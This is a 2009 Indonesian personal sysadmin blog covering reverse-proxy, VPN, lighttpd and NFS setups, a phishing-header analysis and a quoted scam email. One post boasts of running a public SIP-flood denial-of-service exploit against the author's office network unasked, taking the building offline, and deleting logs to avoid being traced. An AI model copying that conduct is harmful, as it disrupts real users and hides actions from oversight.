access_log /var/log/nginx/host.access.log main;

# Main location
location / {
proxy_pass http://127.0.0.1:8080/;
proxy_redirect off;

proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

client_max_body_size 10m;
client_body_buffer_size 128k;

proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;

proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
}

# Static files location
location ~* ^.+.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|txt|tar|mid|midi|wav|bmp|rtf|js)$ {
root /spool/www/members_ng;
}

}
}

download modul rpaf

wget http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz

root@boc [~/mod_rpaf-0.6]# more README
mod_rpaf - reverse proxy add forward

This module does the opposite of mod_proxy_add_forward written
by Ask Bjørn Hansen. http://develooper.com/code/mpaf/

Compile and Install for 1.3:

apxs -i -a -c mod_rpaf.c

Compile and Install for 2.0:

apxs -i -c -n mod_rpaf-2.0.so mod_rpaf-2.0.c

or simply try:
make

Configuration Directives:
RPAFenable On
# Enable reverse proxy add forward
RPAFproxy_ips 127.0.0.1 10.0.0.1
# which ips are forwarding requests to us
RPAFsethostname On
# let rpaf update vhost settings
# allows to have the same hostnames as in the "real"
# configuration for the forwarding Apache
RPAFheader X-Forwarded-For
# Allows you to change which header mod_rpaf looks
# for when trying to find the ip the that is forwarding
# our requests



vi /usr/local/apache/conf.d/rpaf.conf


# Path to mod_rpaf-2.0.so, relative to /etc/httpd/
LoadModule rpaf_module modules/mod_rpaf-2.0.so

RPAFenable On
RPAFsethostname On

#Define our reverse proxy IP. Only substitute client IP in
#when we receive a request from this IP.
RPAFproxy_ips 127.0.0.1

# The header where the real client IP address is stored.
RPAFheader X-Forwarded-For

restart httpd , start nginx , jalan deh ................

Download Backtrack in Indonesia

This is new link to download backtrack in indonesia network, i make this for my contribution as opensource lovers ... , greats to http://opensource.telkomspeedy.com

download :

http://repo.opensource.telkomspeedy.com/backtrack/

we hope you enjoy ......

Saturday, July 18, 2009

Fake email ??? or ...

Beginilah social engineering yang dilakukan pihak yang tidak bertanggung menggunakan fake email ke victim nya ,

Flag this message
You've received a photo from facebook.com!
Wednesday, July 15, 2009 10:52 AM
From:
"facebook.com"
Add sender to Contacts
To:
artikel@sekuritionline.net


saya melihat header dari email yang masuk
================================================================================

Return-Path:
Authentication-Results: mta131.mail.ac4.yahoo.com from=81-15-214-1.wyrzysk.net.pl; domainkeys=neutral (no sig); from=81-15-214-1.wyrzysk.net.pl; dkim=neutral (no sig)
Received: from 127.0.0.1 (EHLO omta0109.mta.everyone.net) (216.200.145.38) by mta131.mail.ac4.yahoo.com with SMTP; Tue, 14 Jul 2009 20:52:34 -0700
Received: from dm0208.mta.everyone.net (sj1-slb03-gw2 [172.16.1.96]) by omta0109.mta.everyone.net (Postfix) with ESMTP id 7B897648A7; Tue, 14 Jul 2009 20:52:33 -0700 (PDT)
Received: from 81-15-214-1.wyrzysk.net.pl (81.15.214.1 [81.15.214.1]) by dm0208.mta.everyone.net (EON-INBOUND) with ESMTP id dm0208.4a4aabf3.7e2b6ae for ; Tue, 14 Jul 2009 20:52:33 -0700
Received: from apache by 81-15-214-1.wyrzysk.net.pl with local (Exim 4.24) id 1MQvXh-0002HU-9z for artikel@sekuritionline.net; Wed, 15 Jul 2009 05:52:29 +0200
To: artikel@sekuritionline.net
Subject: You've received a photo from facebook.com!
From:
facebook.com
Add sender to Contacts
Content-Type: text/html
Message-Id:
Sender: User for Apache
Date: Wed, 15 Jul 2009 05:52:29 +0200
Content-Length: 944

terlihat

apache@81-15-214-1.wyrzysk.net.pl

pelaku memanfaatkan teknik ini untuk memanfaatkan kematian michael jackson dengan menekan tombol link yang tertera tetapi extensionnya berbentuk exe :)

pesan saya hati2x terhadap email yang masuk ke inbox anda , jangan sembarangan klik dari iklan2x yang ada :)

hanya mencoba //..\\

Bosan , cari sesuatu , coba-coba deh, siang ini melihat keadaan sekitar saya duduk, sepi banget kantor ini deh, saya cuma test aja sih , bukan bermaksud lain.

Os yang saya gunakan Linux base on Ubuntu , Rhel 5 , saya coba remote ke mesin RHEL 5 , iseng menjalankan

http://www.milw0rm.com/exploits/7262

Microsoft Communicator allows remote attackers to cause a denial of service (memory consumption) via
# a large number of SIP INVITE requests, which trigger the creation of many sessions.

Apalagi disini SIP nya digunakan , alhasil , kurang lebih 1 menit internetnya down , segedung pula jatohnya , ampun dj , gak lupa hapus log dulu takut ke trace :) , lagi saya cuma ujicoba aja ternyata berhasil :D , dari pada bengong gak karuan mending cari ide lagi deh

Saturday, June 06, 2009

OpenVpn di Vista

ada kendala untuk openvpn vista karena

Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]
Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]
Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]
Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]

saya lihat config ovpn lalu tambahkan ...

route-method exe
route-delay 2


berikut hasilnya

OK!
OK!
OK!
OK!
Sun Jun 07 06:25:12 2009 Initialization Sequence Completed

Thursday, May 28, 2009

No sound Ubuntu 9.04 HP Pavilion tx2612AU

This is howto ubuntu 9.04 have a sound and keep beep in you tablet PC :D , i try to search in google and there are problem in Jaunty

for me :

1. Pen pointer
2. Sound

for sound i find the solution here we go

add the line /etc/modprobe.d/alsa-base.conf

options snd-hda-intel index=0 model=toshiba position_fix=1
options snd-hda-intel index=0 model=acer


for the point 1 , im still do it ...

Wednesday, May 27, 2009

Repo Ubuntu yang terdekat dari network

Install ubuntu Jaunty Jackalope 9.04 telah berhasil di tablet pc saya, skarang tinggal cari repo terdekat
kambing.ui.edu (UI, Telkom, Indosat, OpenIXP, INHERENT)

# deb http://kambing.ui.edu/ubuntu jaunty main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-updates main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-security main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-backports main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-proposed main restricted universe multiverse

www.foss-id.web.id (Telkom)

# deb http://dl2.foss-id.web.id/ubuntu jaunty main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-updates main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-security main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-backports main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-proposed main restricted universe multiverse

mirror.cbn.net.id (OpenIXP)

1. deb http://ubuntu.cbn.net.id/Ubuntu jaunty main restricted universe multiverse
2. deb http://ubuntu.cbn.net.id/Ubuntu jaunty-updates main restricted universe multiverse
3. deb http://ubuntu.cbn.net.id/Ubuntu jaunty-security main restricted universe multiverse
4. deb http://ubuntu.cbn.net.id/Ubuntu jaunty-backports main restricted universe multiverse
5. deb http://ubuntu.cbn.net.id/Ubuntu jaunty-proposed main restricted universe multiverse

ftp.itb.ac.id (ITB, INHERENT)

# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-updates main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-security main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-backports main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-proposed main restricted universe multiverse

komo.vlsm.org

1. deb http://komo.vlsm.org/ubuntu jaunty main restricted universe multiverse
2. deb http://komo.vlsm.org/ubuntu jaunty-updates main restricted universe multiverse
3. deb http://komo.vlsm.org/ubuntu jaunty-security main restricted universe multiverse
4. deb http://komo.vlsm.org/ubuntu jaunty-backports main restricted universe multiverse
5. deb http://komo.vlsm.org/ubuntu jaunty-proposed main restricted universe multiverse

ping semua nya akhirnya ms terkecil jatuh pada foss id

www.foss-id.web.id (Telkom)

# deb http://dl2.foss-id.web.id/ubuntu jaunty main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-updates main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-security main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-backports main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-proposed main restricted universe multiverse

Hajar deh tuh repository local , amd-x2 gw jalan juga pake i386 , gw prefer pake 386 biar develnya gampang

Thursday, May 21, 2009

Push Adrenalin

Tepat jam 1 malam , detik jam terdengar seperti memanggil tidur diriku, tapi aku tak bisa tidur untuk saat ini, aku harus melakukan update kernel pada server, bukan karena diminta oleh seseorang tetapi melainkan atas keinginan diriku sendiri -

hal yang kulakukan:

1. Memastikan aplikasi sudah di update

2. Reboot server

Lho server tidak up , wah pressure tinggi nih, bisa-bisa di demo ribuan player game … , menunggu …

tepat jam 2 malam saya menjadi balanar … sms sana sini kordinasi dengan pihak terkait …

wuihhhhhh wassallam malam hari kok sms , push adrenalin .. bersabar hingga pagi pukul 8 , mencoba telepon kembali done !!!

Eskalasi gangguan telpon sana sini lagi , Done !!!

Andai server depan mataku aku yang up kan sendiri , sayangnya menggunakan system remote yang ada

Kordinasi dengan teman lama dan berhasil …. kembali ..

Jam 12.30 Siang saat ini belum tidur menunggu …. dan Alhamdulillah UP … hampir didemo ribuan player game :) , saya kira server colaps , ternyata prosses reboot kurang sempurna sehingga prosses menjadi stuck …

Jam 1.00 server sudah diupkan kembali , jalankan service sana sini …. berhasil …

Push adrenalinnya bener-bener hebat , pressure yang tinggi , wonderfull … pengalaman yang tak terkira seperti sebelum-sebelumnya :)

Multitasking dan Analisa

Hari ini datang kantor terlambat , kerjaan lumayan antri, kayak antri sembako gitu deh, buka lemari ambil perangkat perang, hal yang dilakukan install aplikasi intruksi deteksi jaringan ( www.snort.com ) 4 jam selesai, abis itu siapkan streaming server buat event, pasang counter statistika awstats, uji bandwidth dan selesai 5 jam, sorenya cpanel down duarrrr , database error , gimana nggak down :

> File upload di limit 8 MB = 1 user upload 8 MB jika 20 user hasilnya 8×20 = 160 MB , dst

> Cpanel hanya tidak bisa dijadikan file sharing apalagi sampai ke streaming lagu

> Perlu Alokasi server baru berupa dedicated server dengan kapasitas storage yang besar dengan cluster yang ada

> Proxy cache bisa nginx , squid load balancer dengan metode round robin

selesai jam 5 waktunya pulang , iseng-iseng buka www.bhinneka.com mau snap sesuatu nih … yummy …

Jumat ini gak sabar mau main snort IDS … tapi masih bingung cari IPS yang opensource , duh kenapa kepikiran baca-baca router ya , sudah lama melupakan mainan ini …

Silencer ….

… weekendnya tanggung banget ya kamis … hari jumatnya kejepit nasional

dini hari … backup data laptop dulu …

12 malam ……..

Bener-bener hari kebangkitan nasional 20 Mei 2009 hhihihihi :)

Multitasking dan Analisa

Hari ini datang kantor terlambat , kerjaan lumayan antri, kayak antri sembako gitu deh, buka lemari ambil perangkat perang, hal yang dilakukan install aplikasi intruksi deteksi jaringan ( www.snort.com ) 4 jam selesai, abis itu siapkan streaming server buat event, pasang counter statistika awstats, uji bandwidth dan selesai 5 jam, sorenya cpanel down duarrrr , database error , gimana nggak down :

> File upload di limit 8 MB = 1 user upload 8 MB jika 20 user hasilnya 8×20 = 160 MB , dst

> Cpanel hanya tidak bisa dijadikan file sharing apalagi sampai ke streaming lagu

> Perlu Alokasi server baru berupa dedicated server dengan kapasitas storage yang besar dengan cluster yang ada

> Proxy cache bisa nginx , squid load balancer dengan metode round robin

selesai jam 5 waktunya pulang , iseng-iseng buka www.bhinneka.com mau snap sesuatu nih … yummy …

Jumat ini gak sabar mau main snort IDS … tapi masih bingung cari IPS yang opensource , duh kenapa kepikiran baca-baca router ya , sudah lama melupakan mainan ini …

Silencer ….

… weekendnya tanggung banget ya kamis … hari jumatnya kejepit nasional

dini hari … backup data laptop dulu …

12 malam ……..

Bener-bener hari kebangkitan nasional 20 Mei 2009 hhihihihi :)

Tuesday, April 14, 2009

Lighttpd

Duh kata katanya gak usah formil banget ya ... begini opensource.telkomspeedy.com agak-agak berat nih, ya karena banyaknya yang download-download di situs ini akhirnya coba aja deh pake lighttpd berikut langkahnya :).


Install Lighttpd

1. yum install lighttpd

Install package Lighttpd - FastCGI

2. yum install lighttpd-fastcgi php-cli

Konfigurasi Lighttpd dan PHP5

3. vi /etc/php.ini

tambahin

[...]
cgi.fix_pathinfo = 1

Uncomment mod_fastcgi

4. vi /etc/lighttpd/lighttpd.conf

aslinya

[...]
server.modules = (
# "mod_rewrite",
# "mod_redirect",
# "mod_alias",
"mod_access",
# "mod_cml",
# "mod_trigger_b4_dl",
# "mod_auth",
# "mod_status",
# "mod_setenv",
# "mod_fastcgi",
# "mod_proxy",
# "mod_simple_vhost",
# "mod_evhost",
# "mod_userdir",
# "mod_cgi",
# "mod_compress",
# "mod_ssi",
# "mod_usertrack",
# "mod_expire",
# "mod_secdownload",
# "mod_rrdtool",
"mod_accesslog" )
[...]

di ubah ke

[...]
server.modules = (
# "mod_rewrite",
# "mod_redirect",
# "mod_alias",
"mod_access",
# "mod_cml",
# "mod_trigger_b4_dl",
# "mod_auth",
# "mod_status",
# "mod_setenv",
"mod_fastcgi",
# "mod_proxy",
# "mod_simple_vhost",
# "mod_evhost",
# "mod_userdir",
# "mod_cgi",
# "mod_compress",
# "mod_ssi",
# "mod_usertrack",
# "mod_expire",
# "mod_secdownload",
# "mod_rrdtool",
"mod_accesslog" )
[...]

trus

fastcgi.server jangan lupa di uncomment juga

aslinya

[...]
#### fastcgi module
## read fastcgi.txt for more info
## for PHP don't forget to set cgi.fix_pathinfo = 1 in the php.ini
#fastcgi.server = ( ".php" =>
# ( "localhost" =>
# (
# "socket" => "/var/run/lighttpd/php-fastcgi.socket",
# "bin-path" => "/usr/bin/php-cgi"
# )
# )
# )
[...]


jadinya

[...]
#### fastcgi module
## read fastcgi.txt for more info
## for PHP don't forget to set cgi.fix_pathinfo = 1 in the php.ini
fastcgi.server = ( ".php" =>
( "localhost" =>
(
"socket" => "/var/run/lighttpd/php-fastcgi.socket",
"bin-path" => "/usr/bin/php-cgi"
)
)
)
[...]

nah sampai disini berhubung banyak file listing untuk download, uncomment aja

aslinya
#dir-listing.activate = "enable"

jadinya

dir-listing.activate = "enable"

dan bisa deh ..........

sedot ubuntu deh ....

http://opensource.telkomspeedy.com/ubuntu/

Name Last Modified Size Type
Parent Directory/ - Directory
.temp/ 2008-Dec-12 17:47:59 - Directory
debiandvd/ 2009-Mar-29 02:29:30 - Directory
dists/ 2008-Dec-19 01:01:12 - Directory
pool/ 2007-Jun-21 11:03:40 - Directory
project/ 2004-Jun-15 21:21:17 - Directory

lighttpd/1.4.20

Friday, March 06, 2009

intip celana dalem .......

Sebenernya dapatkah kita membaca akses ip berapa yang masuk ke squid , bisa ...

asal squid tersebut :

forwarded_for On

config di http :

LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" X-Forwarded-For

CustomLog logs/X-Forwarded-For_log X-Forwarded-For

lihat log :

tail -f /var/log/httpd/X-Forwarded-For_log

generate awstats :

baca dan teliti :

LogFile="/var/log/httpd/X-Forwarded-For_log"

LogFormat=1


[26][in][my][old]

Wednesday, February 25, 2009

Untungnya mirip

Huaaaaaaammm , gara2x sebuah system akhirnya terpaksa kalong lagi kayak anak aja ya nih .... tapi gak apa deh yang penting berhasil dan akhirnya menyelamatkan kembali semua data dan service rhel 5 ( cpanel hosting hehehehehehe ) ..........

mau tidur dulu ahhh bodo deh besok masuk kesiangan kesiangan deh ....

Friday, February 20, 2009

Router yang berantakan !!!! he3x

Beginilah kalo membandingkan Layer 7 dengan Layer 3 , menurut saya lebih sulit pada layer 7 karena bisa berdasarkan aplikas, tapi berhubung yang saya coba router ...

betapa rentan jalur komunikasi yang terhubung melalui transmisi sampai ke router gateway ... saya pernah membandingkan dan melihat konfigurasi yang menurut saya cukup gak simple , ntah karena malas memasang access list atau sekedar membatasi Privilege , menuju super user ( # ) , jangan terlalu mudah menggunakan password jika perlu kombinasi karakter-karakter yang susah ditebak :D , port 23 menjadi bulan-bulanan para penyusup , dan rajin-rajinlah mengikuti perkembangan security dunia ...

Monday, February 16, 2009

Eits Deh ................

SolarWinds.net, Inc. <-- nih dashboard yang dipake buat monitoring serper2x, terkadang keseharian di kerjaan sambil dan hitung-hitung ternyata ....... 30 serper :D dan semuanya wajib di hardening dan rajin-rajin di check , banyak ya ... semuanya masuk ke iix langsung lewat FO .... lho ???? berminat ??????

Wednesday, February 11, 2009

Sang Musisi ( Intermezo )

Mungkin disini saya share aja mengenai temanku yang satu ini, ntah kenapa yang membuat temenku menjadi begini, kami adalah pecinta musik dulu di sma, bahkan cita-cita saya sendiri ingin menjadi musisi, kelas 2 sma band ini terbentuk, kita sempat ikut pentas musik sana sini, tapi inilah temanku yang paling menggebu-gebu jika urusan musik,walaupun begitu ada sisi kelucuan didirinya, disaat jam pelajaran sejarah, temanku yang satu ini asyik membaca buku musiknya padahal jam sejarah, aku sendiri sih menyimak walau kadang out of control dari pelajaran yang dituju, sampai sampai guru ini sempat melihat apa yang dilakukan oleh temanku satu ini ...

Pak Guru Sejarah : Hei kamu adi jawab pertanyaan saya ....... ( packet data )
Adi : Celingak celinguk seperti ayam kehilangan induknya.
Pak Guru Sejarah : Kamu ini kalau dikasih pertanyaan selalu seperti kebingungan ...
Adi : eh temen-temen apa sih pertanyaannya ( adi bertanya kepada teman-teman saya )
Teman-teman : makanya kalo dikasih pertanyaan tuh simak ( Sniff ) , tadi tuh pak guru tanya siapa presiden RI sekarang ( memang ulah temanku ini ada-ada saja )
Saya : menahan tawa ........
Adi : Langsung berteriak Habibi paaaaaaaaak
Teman-teman : Ngakak setengah mati semua ....

Adi : iya pak habibilah sambil menunjuk photo didepan ( kebetulan saat
itu adalah pasca era kerusuhan 1997 )

Pak Guru Sejarah : hahahahah anak kecil juga tau kalo itu ....

inilah kejadian yang kuingat betapa lucunya temanku ini ... sehingga otaknya seperti abis kena trino.tar.gz ....... yang berkepanjangan ...

Friday, February 06, 2009

Dirimu hanya Lamers !!!

Lagi-lagi banyak phising aksi tipu2x .... penuhin di inbox saya ....

Dear Friend,

My name is Mr.Henry Mazak,supervisory Manager in the United Bank for Africa(UBA),Ouagadougou,Burkina Faso,West Africa. I have a business Deal worth of Seventeen Million,Five hundred Thousand U.S. Dollars and I need your assistance in executing this business from my country and investing in your country.

Please reply back to me immediately if you are interested so that i can send you more details of this transaction.

Thank you for your time and i look forward to working with you.

Yours,
Mr.Henry Mazak

dirimu hanya lamer ...

aksi tipu-tipu ...... spam sana-sini ... thats is cupu ... :D , tobatlah ... kembali ke jalan yang benar ...

Tuesday, February 03, 2009

Cheat VIM

Siapa bilang VIM editor di linux gak ada cheatnya , emang ujian aja .. nih .... cheatnya .........

saat Google menjadi singit ....

Coba deh baca disini ..........

"This site may harm your computer" on every search result?!?!

if you did a Google search between 6:30 a.m. PST and 7:25 a.m. PST this morning, you likely saw that the message "This site may harm your computer" accompanied each and every search result. This was clearly an error, and we are very sorry for the inconvenience caused to our users.

What happened? Very simply, human error. Google flags search results with the message "This site may harm your computer" if the site is known to install malicious software in the background or otherwise surreptitiously. We do this to protect our users against visiting sites that could harm their computers. We maintain a list of such sites through both manual and automated methods. We work with a non-profit called StopBadware.org to come up with criteria for maintaining this list, and to provide simple processes for webmasters to remove their site from the list.

We periodically update that list and released one such update to the site this morning. Unfortunately (and here's the human error), the URL of '/' was mistakenly checked in as a value to the file and '/' expands to all URLs. Fortunately, our on-call site reliability team found the problem quickly and reverted the file. Since we push these updates in a staggered and rolling fashion, the errors began appearing between 6:27 a.m. and 6:40 a.m. and began disappearing between 7:10 and 7:25 a.m., so the duration of the problem for any particular user was approximately 40 minutes.

Thanks to our team for their quick work in finding this. And again, our apologies to any of you who were inconvenienced this morning, and to site owners whose pages were incorrectly labelled. We will carefully investigate this incident and put more robust file checks in place to prevent it from happening again.

Thanks for your understanding.

Update at 10:29 am PST: This post was revised as more precise information became available (changes are in blue). Here's StopBadware's explanation.

Posted by Marissa Mayer, VP, Search Products & User Experience

...

Kmarin saat saya sedang membuat vpn dan akhirnya saya terpaksa terkapar dirumah seharian senin ini , oke next begini kronologinya saya sempetin buka google hasilnya mengarah ke stopbadware semua seperti terkena malware ... malam itu saya sempat chat bareng temen saya di bandung sama bro ian , saya pikir sih mungkin google
terkena serangan semacam virus ... tapi ternyata ....

disinyalir sebagai human error ... namanya juga manusia yang ciptain pasti ada juga kesalahannya ... tuh ada bacaaanya diatas

apa jangan2x banyak pegawai google di phk ya ........ jadi semacam konspirasi gitu ... entah lah !!!!

neh link tambahan

http://blog.stopbadware.org/2009/01/31/google-glitch-causes-confusion

Monday, February 02, 2009

In The Darkness ....






Hari ini iseng capture kipas laptop nih .... setelah seharian ambil cuti ... yah karena sakit dan sekarang sudah mendingan ...

Sunday, February 01, 2009

Openvpn.net

Ada hal yang menarik mengenai openvpn , saya sempet melihat temen menggunakan vpn ini , cukup memudahkan apalagi saya bekerja sebagai operational , menangani gangguan , baik yang terlihat maupun kasat mata ( emang genderuwo ) ...



Ok sebenernya mudah sih install openvpn

Logikamya begini

connect ke server -- accept route - masqurade di eth1 ke dalam ,

langkah2x sih :

install webmin supaya gak ribet
install module vpn webmin

pas mau create Certification Authority List

dikolom masukin STare : DKI KOTA : DKI gak bisa masih ada bugnya <--- lom sempet cari tau nih
need to long 2 byte character kalo gak salah sih

akhirnya terpaksa default state US : kota : newyork ( hehehe gaya banget )

masukin akses server - client ....

duh : lagi gak enak body nih ... tulisan seadanya aja mo bobo cepet ....

Thursday, January 29, 2009

NFS - aslinya - tambahinnya - jadinya

#vi /etc/fstab

aslinya
/dev/rootVG/rootlv / ext3 defaults 1 1
LABEL=/boot /boot ext3 defaults 1 2
devpts /dev/pts devpts gid=5,mode=620 0 0
tmpfs /dev/shm tmpfs defaults 0 0
proc /proc proc defaults 0 0
sysfs /sys sysfs defaults 0 0
/dev/rootVG/swapLV swap swap defaults 0 0

tambahinnya


/dev/rootVG/rootlv / ext3 defaults 1 1
LABEL=/boot /boot ext3 defaults 1 2
devpts /dev/pts devpts gid=5,mode=620 0 0
tmpfs /dev/shm tmpfs defaults 0 0
proc /proc proc defaults 0 0
sysfs /sys sysfs defaults 0 0
/dev/rootVG/swapLV swap swap defaults 0 0
192.168.140.22:/data/app/iqbal /data/app/iqbal nfs auto,rw,nodev,nosuid,nolock,sync,_netdev,proto=udp,retry=10,rsize=32768,wsize=32768,hard,intr 0 0

#mkdir /data/app/iqbal

#mount -a

#df -hT

jadinya

Filesystem Type Size Used Avail Use% Mounted on
/dev/mapper/rootVG-rootlv
ext3 74G 30G 41G 42% /
/dev/cciss/c0d0p1
ext3 99M 30M 64M 32% /boot
tmpfs tmpfs 3.9G 0 3.9G 0% /dev/shm
192.168.140.22:/data/app/iqbal
nfs 1.0T 8.5G 1016G 1% /data/app/iqbal

simple kan !!! NFS - aslinya - tambahinnya - jadinya ...

Frekuensi oh Frekuensi

Berikut ini adalah link mengenai penggunaan frekuensi yang diterbitkan oleh pemerintah dan postel ...........


http://www.postel.go.id/content/ID/regulasi/frekuensi/kepmen/pm%207.pdf

baca-baca dari millist indowli disebutkan frekuensi 2.4 tidak lagi free .... benarkah ???? ..................................

Wednesday, January 28, 2009

Idiotique ........ or what ???? in the biggest hosting ....

iqbal: selamat pagi mbak / mas
iqbal: mau tanya nih masih ada gangguan kah untuk akses ke situs www.xxxxxxxxxxxxx.net
pt_mwn_supp10: sebentar saya cek
pt_mwn_supp10: masih sorry sepertinya website Anda terkena limit dari server kami
iqbal: oww
iqbal: sampai kapan ya
iqbal: awal bulan ?
pt_mwn_supp10: Di layanan shared hosting, untuk aktifivitas pengunjung yang bisa diduga ramai seperti itu, kami sarankan Anda upgrade ke paket server (Colocation/Dedicated). Dengan Colocation/Dedicated tidak ada batasan-batasan limit, karena dalam server tersebut hanya untuk digunakan oleh user Anda sendiri.
iqbal: usernya sedikit kok
iqbal: tapi mungkin kmarin lagi ramai
iqbal: quota nya baru sedikit
iqbal: lho
iqbal: Average 394.04 1232.22 8797.33 156.06 MB
Total 10639 33270 237528 4.11 GB
iqbal: baru 4 GB
iqbal: bulan lalu aja
iqbal: Average 381.84 973.81 9263.13 156.61 MB
Total 11837 30188 287157 4.74 GB
iqbal: coba di compare deh
iqbal: itu juga gak sampai 20 GB
iqbal: lho
iqbal: ada apa ya ?
iqbal: http://id.masterweb.net/layanan_harga_hosting.html
pt_mwn_supp10: Tulisan sorry tersebut akan hilang jika aktivitas pada web Anda sudah dibawah limit yang kami berikan
iqbal: limnit nya berapa ?
iqbal: ini blom sampe 5 Gb lho
iqbal: coba liat statistika nya deh
iqbal: spanel
iqbal: di awstats
pt_mwn_supp10: Boleh tahu range pengunjung web Anda per hari
iqbal: 6611
10639
(1.6 visits/visitor) 33270
(3.12 pages/visit) 237528
(22.32 hits/visit) 4.11 GB
(405.55 KB/visit)
iqbal: bandwidth kan tersedia 20 GB ya
iqbal: situs ini baru belum sampai 1 bulan = 4.11 GB
iqbal: pemakaian bw gak pernah sampai 20 GB
iqbal: 10 GB juga gak pernah
iqbal: kalau dirata2x < 5 GB
pt_mwn_supp10: kalau pengunjung Anda sampai sekitar 6000 per hari itu cukup banyak pak
iqbal: tapi bukannya tergantung quota limit giga nya
iqbal: ya
iqbal: bukan pengunjung nya
pt_mwn_supp10: sebagai catatan ada klien kami yang memiliki range pengunjung sekitar 4000 juga trekena sorry akhirnya klien tersebut memamfaan layanan kami yaitu vps
iqbal: bukannya limit giga byte nya
iqbal: nih limit nya
pt_mwn_supp10: kalau bandwith biasanya errornya adalah bandwith limit excedeed
iqbal: jadi ini statistika yang diberikan oleh master web berdasarkan dari bandiwdth atau concurency user ?
iqbal: tapi kalau hosting itu limit berdasarkan quota bandwidth
iqbal: bukan berdasarkan pengunjung lho
iqbal: maaf ini dengan siapa ya saya berbicara
pt_mwn_supp10: statistik di MWN itu untuk mengetahui berapa pengunjung yang datang ke website Anda juga data transfer yang Anda lakukan
iqbal: nah
iqbal: kalau dari awstats
iqbal: yang dari MWN itu tidak valid ?
iqbal: 4.11 GB
iqbal: segitu lho
pt_mwn_supp10: Kami selalu mengenerate data statistik setiap harinya
iqbal: jadi ini yang bener berdasarkan apa ya
iqbal: pengunjung
iqbal: atau bandiwdth
iqbal: We are sorry, your request cannot be completed because the server is under maintenance. Please try again a few minutes later.

Maaf, halaman yang Anda inginkan belum dapat ditampilkan karena server sedang maintenance. Harap mencoba beberapa menit lagi.
iqbal: menurut saya sih gak logis
iqbal: seharusnya hosting itu bukannya berdasarkan bandiwdth yang terquota
iqbal: bukan per concurency user
pt_mwn_supp10: Ada beberapa faktor pertama pengunjung kedua Anda menggunakan mysql atau apache yang besar
pt_mwn_supp10: Coba Anda pindahkan sementara data di web Anda ke folder home bukan ke folder ww
pt_mwn_supp10: lalu cek Apakah website Anda tetap tampil atau tetap sorry
iqbal: ok let me try ...
iqbal: ini sudah di chmod lho
iqbal: masih tetep juga
iqbal: kalau apache yang besar
iqbal: dan mysql yang besar
iqbal: berarti ada attack donk
iqbal: saya pengen tau sebenernya awstats itu valid apa tidak ?
iqbal: boleh tau saya berbicara dengan siapa ya ini ?

nb : ditawarin vps .... emang gw orang kaya ? beli segala kayak gitu modal dari mana ... kalo ada mah bisa gw bisa hardening sendiri ... kalau mau nyumbang sih gak apa2x .... tujuan situs ini komunitas untuk pengetahuan orang banyak ... penggila opensource , pecinta security dan lain-lain

1. Awstats yang disediakan itu valid atau tidak ?
2. Hosting itu berdasarkan quota bandiwidth atau pengunjung ...
3. Ternyata doi orang marketing ... cuma ym nya sih technical support ... atau
double job ...
4. Quota neh web mana pernah sampe 10 GB boro2x sampe 10 GB ... sampe 5 GB juga gak
pernah ...
5. Attack DDOS dari mana ? ... bukannya bisa di block ya dari router gw nya

Friday, January 23, 2009

httpry - http packet sniffer logging

source : http://www.packetstormsecurity.com/sniffers/httpry-0.1.4.tar.gz

Description:
httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but instead to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the live traffic on the wire, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications. It does not display the raw HTTP data transferred, but instead focuses on parsing and displaying the request/response line along with associated header fields.
Author: Dumpster Keeper
Homepage: http://dumpsterventures.com/jason/httpry/
Changes: Adds a few nice improvements to the base program. The biggest change is that the program now defaults to parsing all standard HTTP methods.
File Size: 44477
Last Modified: Jan 13 19:13:48 2009
MD5 Checksum: ab5cdae9317908bac3c67fb9f26cf00e

extract

make
makeinstall


root@boc [~/httpry-0.1.4]# ./httpry -i eth1
httpry version 0.1.4 -- HTTP logging and information retrieval tool
Copyright (c) 2005-2009 Jason Bittel
Starting capture on eth1 interface
2009-01-23 14:57:41 10.11.12.66 10.11.21.200 > GET 10.11.21 .200 / HTTP/1.1 - -
2009-01-23 14:57:41 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:00:25 10.11.12.66 10.11.21.200 > GET 10.11.21 .200 / HTTP/1.1 - -
